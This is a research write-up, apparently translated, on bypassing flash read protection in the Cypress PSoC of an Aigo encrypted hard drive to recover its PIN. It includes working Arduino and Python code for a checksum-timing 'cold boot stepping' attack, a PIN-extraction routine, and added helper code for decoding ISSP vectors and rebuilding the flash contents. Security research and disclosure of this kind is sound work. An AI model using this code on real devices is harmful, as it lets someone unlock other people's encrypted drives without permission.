Reverse engineering and hacking the Aigo encrypted external HDD. Part 2: Dumping the Cypress PSoC

This is the second and final part of the article on hacking an external encrypted drive. As a reminder: a colleague recently brought me a Patriot (Aigo) SK8671 external hard drive, I decided to reverse it, and now I am sharing what came out of it. Before reading on, be sure to read the first part of the article.

4. We start dumping the internal PSoC flash
5. The ISSP protocol
- 5.1. What is ISSP
- 5.2. Demystifying vectors
- 5.3. Communicating with the PSoC
- 5.4. Identifying on-chip registers
- 5.5. Security bits
6. First (failed) attack: ROMX
7. Second attack: cold boot stepping
- 7.1. Implementation
- 7.2. Reading the results
- 7.3. Reconstructing the flash binary
- 7.4. Finding the PIN storage address
- 7.5. Dumping block 126
- 7.6. Recovering the PIN
8. What's next?
9. Conclusion



4. We start dumping the internal PSoC flash

So, everything indicates (as we established in [the first part]()) that the PIN is stored somewhere in the PSoC flash. Therefore we need to read that flash. The plan of the work ahead:

  • establish "communication" with the microcontroller;
  • find a way to check whether this "communication" is protected against reading from the outside;
  • find a way to bypass the protection.

There are two places where it makes sense to look for the correct PIN:

  • the internal flash memory;
  • the SRAM, where the PIN may be stored in order to compare it with the PIN entered by the user.

Looking ahead, I will note that I did manage to dump the internal PSoC flash, bypassing the security system with a hardware attack called "cold boot stepping", after reverse engineering the undocumented features of the ISSP protocol. This allowed me to dump the actual PIN directly.

$ ./psoc.py 
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9

Final program code:

5. The ISSP protocol

5.1. What is ISSP

"Communicating" with a microcontroller can mean different things, and it varies from vendor to vendor: for example, interaction over a serial protocol (ICSP for Microchip's PIC).

Cypress has its own proprietary protocol for this, called ISSP (in-system serial programming protocol), which is partially described in the technical specification. Patent US7185162 also gives some details. There is also an open-source equivalent called HSSP (we will use it a little later). ISSP works as follows:

  • reset the PSoC;
  • output a magic number on the serial data pin of that PSoC to enter external programming mode;
  • send commands, which are long bit strings called "vectors".

The ISSP documentation defines vectors only for a small set of commands:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V options)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111, where dddddddd = block #
  • BULK-ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1, where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111, where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1, where DDDDDDDDDDDDDDDD = data out: device checksum
  • ERASE BLOCK

For example, the Initialize-2 vector:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

All vectors have the same length: 22 bits. The HSSP documentation has a bit more to say about ISSP: "An ISSP vector is nothing but a bit sequence representing a set of instructions."

5.2. Demystifying vectors

Let's figure out what is going on here. At first I assumed that these vectors were raw M8C instructions, but after checking this hypothesis I found that the opcodes of the operations did not match.

Then I googled the vector above and came across a write-up whose author, while not going into detail, gives some useful hints: "Each instruction begins with three bits that correspond to one of four mnemonics (read from RAM, write to RAM, read register, write register). Then come 8 address bits, then 8 data bits (read or write) and finally three stop bits."

Then I was able to gather some very useful information from the Supervisory ROM (SROM) section of the technical manual. The SROM is a hard-coded ROM in the PSoC that provides useful functions (similar to syscalls) to the program code running in user space:

  • 00h: SWBootReset
  • 01h: ReadBlock
  • 02h: WriteBlock
  • 03h: EraseBlock
  • 06h: TableRead
  • 07h: CheckSum
  • 08h: Calibrate0
  • 09h: Calibrate1

By comparing the vector names with the SROM functions, we can map the various operations supported by this protocol to the expected SROM parameters. Thanks to this, we can decode the first three bits of the ISSP vectors:

  • 100 => "wrmem"
  • 101 => "rdmem"
  • 110 => "wrreg"
  • 111 => "rdreg"

However, a full understanding of what happens on the chip could only be obtained by communicating directly with the PSoC.
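As an added example (not code from the article, nor the HSSP_disas.rb tool it mentions), here is an encoder/decoder for the 22-bit vector layout inferred above (3 op bits, 8 address bits, 8 data bits, 3 stop bits). The register and RAM names are the ones used in the article's listings; any other address is printed as plain hex.

```python
# Added example; not from the article or from the HSSP_disas.rb tool it mentions.
# Encodes/decodes ISSP vectors with the inferred 22-bit layout and renders them
# in the "[DE E0 1C] wrreg CPU_F (f7), 0x00" form used in the article's listings.
OPS = {0b100: "wrmem", 0b101: "rdmem", 0b110: "wrreg", 0b111: "rdreg"}
# Names as they appear in the article's listings (0xF8-0xFA double as the
# undocumented opcode registers when written via wrreg). Others print as hex.
REG_NAMES = {0xF0: "A", 0xF3: "X", 0xF4: "PCl", 0xF5: "PCh", 0xF6: "SP",
             0xF7: "CPU_F", 0xF8: "opc0", 0xF9: "opc1", 0xFA: "opc2",
             0xFF: "CPU_SCR0"}
RAM_NAMES = {0xF8: "KEY1", 0xF9: "KEY2", 0xFA: "BLOCKID", 0xFB: "POINTER"}

# The Initialize-2 vector from the ISSP documentation, as quoted in the article.
INIT2 = """
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111
""".split()


def encode_write(op, addr, data):
    """Build the 22-bit string of a wrmem/wrreg vector (writes end in '111')."""
    opcode = {name: code for code, name in OPS.items()}[op]
    return "{:03b}{:08b}{:08b}111".format(opcode, addr, data)


def decode_vector(bits):
    """Split a 22-bit vector into (mnemonic, address, data_field, stop_bits).

    For write vectors data_field is an int. For read vectors the device drives
    the bus, so the 8 data positions are returned verbatim ('D' placeholders in
    the documentation) and the tail 'Z1' is returned as the stop field.
    """
    if len(bits) != 22:
        raise ValueError("ISSP vectors are 22 bits, got %d: %r" % (len(bits), bits))
    op = OPS.get(int(bits[0:3], 2), "op" + bits[0:3])
    addr = int(bits[3:11], 2)
    if op in ("rdmem", "rdreg"):                      # 101/111: Z DDDDDDDD Z 1
        return op, addr, bits[12:20], bits[20:]
    return op, addr, int(bits[11:19], 2), bits[19:]   # 100/110: dddddddd 111


def disas(bits):
    """Render one write vector the way the article's listings do."""
    op, addr, data, _stop = decode_vector(bits)
    raw = int(bits + "00", 2).to_bytes(3, "big").hex(" ").upper()  # 22 bits, left-aligned
    if op == "wrreg" and addr in REG_NAMES:
        text = "wrreg %s (%02x), 0x%02X" % (REG_NAMES[addr], addr, data)
    elif op == "wrmem" and addr in RAM_NAMES:
        text = "wrmem %s, 0x%02X" % (RAM_NAMES[addr], data)
    else:
        text = "%s 0x%02X, 0x%02X" % (op, addr, data)
    return "[%s] %s" % (raw, text)


def disas_init2():
    """Disassemble the whole Initialize-2 vector, one line per 22-bit word."""
    return [disas(v) for v in INIT2]
```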

5.3. Communicating with the PSoC

Since Dirk Petrautsky had already ported Cypress's HSSP code to Arduino, I used an Arduino Uno to connect to the ISSP connector of the keyboard board.

Note that in the course of my research I modified Dirk's code a little. You can find my modification on GitHub (here), and the corresponding Python script for talking to the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the "official" vectors to "communicate". I tried to read the internal ROM using the VERIFY command. As expected, I could not. Most likely because the protection bits are set in the flash.

Then I created a few simple vectors of my own for writing and reading memory/registers. Note that we can read the entire SROM even though the flash is protected!

5.4. Identifying on-chip registers

After looking at the "disassembled" vectors, I found that the device uses undocumented registers (0xF8-0xFA) to execute M8C opcodes, which run directly, bypassing the protection. This allowed me to run various opcodes such as "ADD", "MOV A,X", "PUSH" or "JMP". Thanks to them (by looking at their side effects on the registers) I was able to determine which of the undocumented registers were in fact the regular registers (A, X, SP and PC).

As a result, the "disassembled" code produced by the HSSP_disas.rb tool looks like this (comments added by me for clarity):

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00   # reset flags
[DE C0 1C] wrreg SP (f6), 0x00      # reset SP
[9F 07 5C] wrmem KEY1, 0x3A     # mandatory argument for SSC
[9F 20 7C] wrmem KEY2, 0x03     # likewise
[DE A0 1C] wrreg PCh (f5), 0x00     # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03     # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80      # RAM pointer for the output data
[DF 26 1C] wrreg opc1 (f9), 0x30        # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40        # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01  # BLOCK ID for the SSC call
[DE 00 DC] wrreg A (f0), 0x06       # "Syscall" number: TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00        # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12    # Undocumented operation: execute the external opcode

5.5. Security bits

At this stage I could already communicate with the PSoC, but I still had no reliable information about the flash security bits. I was very surprised that Cypress gives the device user no way at all to check whether the protection is enabled. I dug deeper into Google and eventually understood that the HSSP code provided by Cypress had been updated after Dirk released his modification. Great! This new vector had appeared:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # unknown arguments
[9F E0 1C] wrmem 0xFF, 0x00 # likewise
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10   # undocumented syscall!
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Using this vector (see read_security_data in psoc.py), we get all the security bits into SRAM at 0x80, with two bits per protected block.

The result is depressing: everything is protected in "disable external read and write" mode. Therefore, not only can we not read anything from the flash, we cannot write anything either (for example, to install a ROM dumper there). And the only way to disable the protection is to erase the entire chip. 🙁

6. First (failed) attack: ROMX

However, we can try the following trick: since we are able to execute arbitrary opcodes, why not execute ROMX, which is used to read flash memory? This approach has a decent chance of success, because the ReadBlock SROM function (the one used by the vectors) checks whether it was called from ISSP, whereas the ROMX opcode probably has no such check. So here is the Python code (after adding a few helpers to the Arduino code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)       # A = high byte of the flash address
    write_reg(0xF3, i&0xFF)     # X = low byte of the flash address
    exec_opcodes("\x28\x30\x40")  # ROMX, HALT, NOP
    byte = read_reg(0xF0)       # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0]) # print the ROM byte

Unfortunately this code does not work. 🙁 Or rather, it works, but we get our own opcodes back in the output (0x28 0x30 0x40)! I do not think this behaviour of the device is part of the read protection. It looks more like an engineering trick: while executing external opcodes, the ROM bus is redirected to a temporary buffer.

7. Second attack: cold boot stepping

Since the ROMX trick did not work, I started thinking about another variant of this trick, the one described in the paper "Shedding too much Light on a Microcontroller's Firmware Protection".

7.1. Implementation

The ISSP documentation gives the following vectors for CHECKSUM-SETUP:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This essentially calls SROM function 0x07, as described in the documentation (italics mine):

This function verifies the checksum. It computes a 16-bit checksum of the specified number of user blocks in a single flash bank, starting from zero. The BLOCKID parameter is used to pass the number of blocks to use when computing the checksum. A value of "1" will compute the checksum only for block zero, whereas "0" will cause the total checksum of all 256 blocks of the flash bank to be computed. The 16-bit checksum is returned through KEY1 and KEY2. The KEY1 parameter holds the low-order 8 bits of the checksum and the KEY2 parameter holds the high-order 8 bits. For devices with multiple flash banks, the checksum function is called for each of them separately. The bank number it will operate on is set by the FLS_PR1 register (by setting the bit in it that corresponds to the target flash bank).

Note that this is a simple checksum: the bytes are added one after another; no fancy CRC. Moreover, knowing that the M8C core has a very small register set, I assumed that during the checksum computation the intermediate values would be kept in the same variables that eventually go to the output: KEY1 (0xF8) / KEY2 (0xF9).

So, in theory, my attack looked like this:

  1. Connect via ISSP.
  2. Start the checksum computation using the CHECKSUM-SETUP vector.
  3. Reset the processor after a specified time T.
  4. Read the RAM to get the current checksum C.
  5. Repeat steps 3 and 4, increasing T a little each time.
  6. Recover the flash data by subtracting the previous checksum C from the current one.

However, there is a problem: the Initialize-1 vector, which we have to send after a reset, overwrites KEY1 and KEY2:

1100101000000000000000  # Magic that puts the PSoC into programming mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # the checksum is overwritten here
[9F 20 7C] wrmem KEY2, 0x03 # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09   # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00    # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This code overwrites our precious checksum by calling Calibrate1 (SROM function 9)… Perhaps we could send only the magic number (from the beginning of the code above) to enter programming mode, and then read the SRAM? And yes, it works! The Arduino code implementing this attack is quite simple:

case Cmnd_STK_START_CSUM:
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();
    if(checksum_delay)
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();

  1. Read checksum_delay.
  2. Run the checksum computation (send_checksum_v).
  3. Wait the specified time, bearing in mind the following problems:
    • I wasted a lot of time before finding out that delayMicroseconds only works correctly with delays not exceeding 16383 µs;
    • and then the same amount of time again before finding out that delayMicroseconds, when 0 is passed to it as input, works completely wrong!
  4. Reset the PSoC into programming mode (we only send the magic number, without sending the initialization vectors).

The final code in Python:

for delay in range(0, 150000):  # delay in microseconds
    for i in range(0, 10):      # number of readings for each delay
        try:
            reset_psoc(quiet=True)  # reset and enter programming mode
            send_vectors()      # send the initialization vectors
            ser.write("\x85"+struct.pack(">I", delay)) # compute the checksum + reset after the delay
            res = ser.read(1)       # read the Arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # reopen the serial port
            continue
        print "%05d %02X %02X %02X" % (delay,      # read the RAM bytes
                read_regb(0xf1),
                read_ramb(0xf8),
                read_ramb(0xf9))

In short, what this code does:

  1. Resets the PSoC (and sends the magic number).
  2. Sends the full initialization vectors.
  3. Calls the Arduino function Cmnd_STK_START_CSUM (0x85), passing the delay in microseconds as a parameter.
  4. Reads the checksum (0xF8 and 0xF9) and the undocumented register 0xF1.

This code is executed 10 times for each 1 µs delay step. 0xF1 is included here because it is the only register that changed during the checksum computation. It is probably some kind of temporary variable used by the arithmetic unit. Note the ugly hack I use to reset the Arduino with picocom when the Arduino stops showing signs of life (for no apparent reason).

7.2. Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 – the unknown register mentioned above
                  # F8 low byte of the checksum
                  # F9 high byte of the checksum

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # the checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # 1st byte: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00   # 2nd byte: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # no idea what is going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 again?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Ah, got it! That is the carry into the high byte
00063 01 17 01
[...]
00075 CC 17 01  # So, 0x117-0xE7: 0x30

That said, we have a problem: since we are working with a plain checksum, a zero byte does not change the value we read. However, since the whole computation (8192 bytes) takes 0.1478 seconds (with small variations from run to run), which corresponds to about 18.04 µs per byte, we can use this timing to sample the checksum value at the right moments. For the first runs everything reads quite easily, since the duration of the computation is always about the same. However, the end of this dump is less accurate, because the "small timing deviations" of each run add up and become more significant:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

That is 10 iterations for each microsecond of delay. The total running time to dump all 8192 bytes of flash is about 48 hours.
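The reconstruction step described above (differencing the sampled checksum, the zero-byte problem, and the jitter in repeated readings) as an added example; this is not code from the article or its psoc.py tool, but a first cut at the sorting utility the article says is still unwritten. It assumes bytes are summed at a regular US_PER_BYTE spacing, which the article notes holds only approximately; simulate_log and SAMPLE_FLASH are constructed test inputs.

```python
# Added example, not from the article or its psoc.py tool. Majority-votes the
# repeated readings at each delay, differences the 16-bit running checksum
# (F9:F8 = KEY2:KEY1) to get one flash byte per change, and infers 0x00 bytes,
# which never change the checksum, from the per-byte timing.
# ASSUMPTION: bytes are summed at a regular US_PER_BYTE spacing; the article
# notes this only holds approximately and that deviations accumulate.
from collections import Counter

US_PER_BYTE = 18.04   # 0.1478 s / 8192 bytes, as measured in the article


def parse_log(text):
    """Map delay_us -> [(F1, F8, F9), ...] from 'DELAY F1 F8 F9' lines.

    Header lines, '[...]' markers and trailing '# comments' are ignored."""
    by_delay = {}
    for line in text.splitlines():
        parts = line.split("#")[0].split()
        if len(parts) != 4 or not parts[0].isdigit():
            continue
        regs = tuple(int(v, 16) for v in parts[1:])
        by_delay.setdefault(int(parts[0]), []).append(regs)
    return by_delay


def stable_checksums(by_delay):
    """[(delay, checksum)] for delays where one value has a strict majority."""
    out = []
    for delay in sorted(by_delay):
        csums = [(f9 << 8) | f8 for _f1, f8, f9 in by_delay[delay]]
        value, votes = Counter(csums).most_common(1)[0]
        if 2 * votes > len(csums):          # drop delays drowned in jitter
            out.append((delay, value))
    return out


def recover_bytes(stable, us_per_byte=US_PER_BYTE):
    """Flash bytes from successive checksum values.

    Each change of the running sum yields (new - old) mod 0x10000, so a carry
    into KEY2 (e.g. 0x117 - 0xE7 = 0x30) is handled. A gap of more than one
    byte-time between two changes means the skipped bytes were 0x00."""
    flash = []
    prev_delay, prev_csum = stable[0]
    for delay, csum in stable[1:]:
        if csum == prev_csum:
            continue
        flash.extend([0x00] * max(0, round((delay - prev_delay) / us_per_byte) - 1))
        flash.append((csum - prev_csum) & 0xFFFF)   # > 0xFF would mean a lost sample
        prev_delay, prev_csum = delay, csum
    return flash


def simulate_log(flash, t0=16, readings=10, glitch_every=7):
    """Constructed stand-in for the Arduino loop: `readings` lines per 1 us step
    of the running sum over the bytes summed so far; every glitch_every-th line
    has F8 corrupted, mimicking the jitter seen at long delays."""
    lines, n = [], 0
    for delay in range(t0, t0 + int(US_PER_BYTE * (len(flash) + 1)) + 1):
        csum = sum(flash[: int((delay - t0) / US_PER_BYTE)]) & 0xFFFF
        for _ in range(readings):
            n += 1
            f8 = (csum & 0xFF) ^ (0xD0 if n % glitch_every == 0 else 0)
            lines.append("%05d %02X %02X %02X" % (delay, 0xCC, f8, csum >> 8))
    return "\n".join(lines)


# Constructed fragment: the first bytes of the article's disassembly (jmp 0068h,
# then 0x30) plus two zero bytes to exercise the timing-based zero inference.
SAMPLE_FLASH = [0x80, 0x67, 0x30, 0x00, 0x00, 0x71, 0x10]


def demo():
    """Round trip: simulated capture -> majority vote -> recovered bytes."""
    return recover_bytes(stable_checksums(parse_log(simulate_log(SAMPLE_FLASH))))
```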

7.3. Reconstructing the flash binary

I have not yet finished writing the code that reconstructs the flash program code while accounting for all the timing deviations. However, I have already recovered the beginning of that code. To make sure I did it correctly, I disassembled it with m8cdis:

0000: 80 67   jmp  0068h     ; Reset vector
[...]
0068: 71 10   or  F,010h
006a: 62 e3 87 mov  reg[VLT_CR],087h
006d: 70 ef   and  F,0efh
006f: 41 fe fb and  reg[CPU_SCR1],0fbh
0072: 50 80   mov  A,080h
0074: 4e    swap A,SP
0075: 55 fa 01 mov  [0fah],001h
0078: 4f    mov  X,SP
0079: 5b    mov  A,X
007a: 01 03   add  A,003h
007c: 53 f9   mov  [0f9h],A
007e: 55 f8 3a mov  [0f8h],03ah
0081: 50 06   mov  A,006h
0083: 00    ssc
[...]
0122: 18    pop  A
0123: 71 10   or  F,010h
0125: 43 e3 10 or  reg[VLT_CR],010h
0128: 70 00   and  F,000h ; Paging mode changed from 3 to 0
012a: ef 62   jacc 008dh
012c: e0 00   jacc 012dh
012e: 71 10   or  F,010h
0130: 62 e0 02 mov  reg[OSC_CR0],002h
0133: 70 ef   and  F,0efh
0135: 62 e2 00 mov  reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff   jmp  013bh
013d: 50 08   mov  A,008h
013f: 7f    ret

Looks plausible!

7.4. Finding the PIN storage address

Now that we can read the checksum at the moments we need, we can easily check how and where it changes when we:

  • enter a wrong PIN;
  • change the PIN.

First, to find the approximate storage address, I took a checksum dump in 10 ms steps after reset. Then I entered a wrong PIN and did the same.

The result was not very pleasant, since there were many changes. But in the end I was able to determine that the checksum changed somewhere between 120000 µs and 140000 µs of delay. But the "pincode" I extracted there was completely wrong, due to an artifact of the delayMicroseconds routine, which does strange things when 0 is passed to it.

Then, after spending about 3 hours on this, I remembered that the SROM routine called CheckSum takes an argument specifying the number of blocks to checksum! That is, we can easily determine the storage address of the PIN and of the "wrong attempts" counter, with the precision of a 64-byte block.

My first run produced the following result:

[image]

Then I changed the PIN from "123456" to "1234567" and got:

[image]

So it appears that the PIN and the wrong-attempts counter are stored in block number 126.

7.5. Dumping block 126

Block #126 should be located somewhere around 125x64x18 = 144000 µs from the start of the checksum computation in my full dump, and that looks quite plausible. Then, after manually weeding out the invalid dumps (due to the accumulated "small timing deviations"), I ended up with these bytes (at a delay of 145527 µs):

[image]

It is obvious that the PIN is stored unencrypted! These values are of course not ASCII codes, but, as it turns out, they are the readings taken from the capacitive keypad.

Finally, I ran a few more experiments to find where the wrong-attempts counter is stored. Here is the result:

[image]

0xFF means "15 attempts", and it decreases with each failed attempt.

7.6. Recovering the PIN

Here is my ugly code that puts all of the above together:

def dump_pin():
  # keypad readings found in block 126, mapped to the digit each one stands for
  pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
        0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
  last_csum = 0
  pin_bytes = []
  for delay in range(145495, 145719, 16):  # walk block 126 in 16 us steps
    csum = csum_at(delay, 1)
    byte = (csum-last_csum)&0xFF   # each checksum difference is one flash byte
    print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
    pin_bytes.append(byte)
    last_csum = csum
  print "PIN: ",
  for i in range(0, len(pin_bytes)):
    if pin_bytes[i] in pin_map:   # skip everything that is not a keypad reading
      print pin_map[pin_bytes[i]],
  print

Here is the result of running it:

$ ./psoc.py 
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9

Hooray! It works!

Note that the delay values I used may only apply to the specific PSoC I worked with.

8. What's next?

So, let's summarize on the PSoC side, in the context of the Aigo drive:

  • we can read the SRAM even though it is protected;
  • we can bypass the read protection using the cold boot stepping attack and read the PIN directly.

However, our attack has some flaws due to synchronization problems. It could be improved as follows:

  • write a utility to correctly sort out the output data obtained from the "cold boot stepping" attack;
  • use an FPGA to generate more precise timing delays (or use the Arduino's hardware timers);
  • try another attack: deliberately enter a wrong PIN, reset and dump the RAM, in the hope that the correct PIN is kept in RAM for comparison. However, this is not easy to do with the Arduino, since the Arduino's signal level is 5 volts, while the board under study works with 3.3 volt signals.

Another interesting thing to try would be playing with the supply voltage to bypass the read protection. If this approach worked, we could get fully correct data from the flash, instead of relying on reading the checksum with timing delays.

Since the SROM probably reads the security bits via the ReadBlock system call, we could do the same thing described on Dmitry Nedospasov's blog: reimplement Chris Gerlinski's attack, announced at the "REcon Brussels 2017" conference.

Another interesting thing to do would be to decap the chip: to dump the SRAM, and to identify undocumented system calls and vulnerabilities.

9. Conclusion

So, the protection of this drive leaves much to be desired, since it uses an ordinary (not "hardened") microcontroller to store the PIN… Plus, I have not (yet) checked how things stand with the data encryption on this device!

What could be recommended to Aigo? After analyzing several models of encrypted HDDs, in 2015 I gave a talk at SyScan in which I analyzed the security problems of several external HDDs and gave recommendations on what could be improved in them. 🙂

I spent two weekends and several evenings on this research. About 40 hours in total, counting from the very beginning (when I opened the drive) to the end (the PIN dump). Those same 40 hours include the time I spent writing this article. It was a fascinating journey.

source: www.habr.com
